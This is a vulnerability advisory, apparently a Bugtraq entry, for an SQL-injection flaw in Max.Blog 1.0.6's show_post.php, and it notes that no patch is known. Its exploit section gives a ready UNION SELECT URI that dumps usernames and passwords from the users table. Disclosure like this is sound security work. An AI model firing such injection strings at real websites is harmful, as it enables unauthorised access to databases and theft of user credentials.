Max.Blog 'show_post.php' SQL Injection Vulnerability
BID:33466
Info
Max.Blog 'show_post.php' SQL Injection Vulnerability
| Bugtraq ID: | 33466 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Jan 27 2009 12:00AM |
| Updated: | Jan 28 2009 09:59PM |
| Credit: | Salvatore "drosophila" Fresta |
| Vulnerable: |
Max.Blog Max.Blog 1.0.6 |
| Not Vulnerable: | |
Discussion
Max.Blog 'show_post.php' SQL Injection Vulnerability
Max.Blog is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Max.Blog 1.0.6 is vulnerable; other versions may also be affected.
Max.Blog is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Max.Blog 1.0.6 is vulnerable; other versions may also be affected.
Exploit / POC
Max.Blog 'show_post.php' SQL Injection Vulnerability
Attackers can use a browser to exploit this issue.
The following example URI is available:
http://www.example.com/path/show_post.php?id=-1'+UNION+ALL+SELECT+1,concat('username:', username),concat('password: ',password),4,5,6,7+FROM+users+WHERE+id=1%23
Attackers can use a browser to exploit this issue.
The following example URI is available:
http://www.example.com/path/show_post.php?id=-1'+UNION+ALL+SELECT+1,concat('username:', username),concat('password: ',password),4,5,6,7+FROM+users+WHERE+id=1%23
Solution / Fix
Max.Blog 'show_post.php' SQL Injection Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
Max.Blog 'show_post.php' SQL Injection Vulnerability
References:
References:
- Max.Blog Homepage (Max.Blog)
- Max.Blog <= 1.0.6 (show_post.php) SQL Injection Vulnerability ("Salvatore \"drosophila\" Fresta"
)